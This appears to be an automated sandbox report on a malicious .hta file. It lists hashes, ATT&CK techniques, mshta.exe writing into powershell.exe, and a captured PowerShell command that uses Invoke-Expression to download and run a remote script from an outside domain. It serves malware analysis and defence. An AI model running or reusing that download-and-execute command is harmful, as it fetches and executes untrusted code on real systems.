3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6

Analysis

max time kernel
117s
max time network
118s
platform
windows7_x64
resource
win7-20231129-en
resource tags

arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system
submitted
23-05-2024 01:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6.hta
Size

2KB
MD5

f754844cfb65838d1dd6b19dde5d835c
SHA1

b3eb677783adc88c8d048898449e04d49f416db6
SHA256

3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6
SHA512

f42f89562b5c0be86dbd04683ee6c30711155acd1239e273da726c2bfedf5d0806c479b7107792c136bff6e97efb8d9145df0c176f499f86f1b7e304a2e3ccdf

Score

3^/10

execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

2964 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

2964 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2964 powershell.exe

pid	process
2964	powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2964	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2964	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

Processes:

mshta.exe

description	pid	process	target process
PID 2884 wrote to memory of 2964	2884	mshta.exe	powershell.exe
PID 2884 wrote to memory of 2964	2884	mshta.exe	powershell.exe
PID 2884 wrote to memory of 2964	2884	mshta.exe	powershell.exe
PID 2884 wrote to memory of 2964	2884	mshta.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\3644b387519f3509a1ce3d2201e2e1e8af36217138cc6f9e62d6e37c887097a6.hta"
1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads